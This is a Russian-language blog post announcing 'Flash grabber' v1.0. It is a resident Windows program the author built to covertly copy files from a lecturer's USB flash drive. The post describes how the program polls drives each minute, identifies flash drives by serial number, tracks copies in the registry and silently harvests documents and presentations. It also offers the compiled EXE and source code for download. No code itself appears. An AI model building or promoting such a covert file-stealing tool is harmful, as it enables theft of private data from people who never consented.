Flash grabber

Предыстория

Есть у нас препод, который каждую практику спрашивает всё по пройденному материалу, а лекции то писать лень. Да и зачем? Они же все есть на его флешке, которую он бережет как зеницу ока.


И так

Это полноценный релиз версии 1.0 протестированный мной на университетских компьютерах со злостными правовыми ограничениями. На больших файлах пока не тестировал (если будет сильно грузить можно будет попробовать расставить Sleep-ов ~150 миллисекунд для разгрузки процессора), но с кучей мелких доков и презентаций программа справляется приблизительно за минуту (Intel Atom N270 1.60 Ггц, 1Гб ОЗУ) при этом не нагружая процессор даже на половину, а в режиме ожидания вообще практически не влияет на загрузку системы (возможно позже добавлю тестовые отчеты).

В коде нет наворотов, всё предельно тупо и просто. Делалось это из расчета на минимальные права в системе. Программа висит в памяти и с интервалом в минуту проходится по всем логическим дискам, если это флешка запрашивается ее серийный номер - программа сравнивает записи в реестре о последнем копировании с данной флешки и если прошло больше суток запускается рекурсивная функция копирования. Копирование производится на доступный для записи диск с условием, что на диске достаточно свободного места.

Ссылочки

EXE версия - doc,docx,ppt,pptx,rtf - 3.5 Кб

Проект VS-2008 - исходник и настройки проекта - 4.5 Кб

blog comments powered by Disqus
сюда туда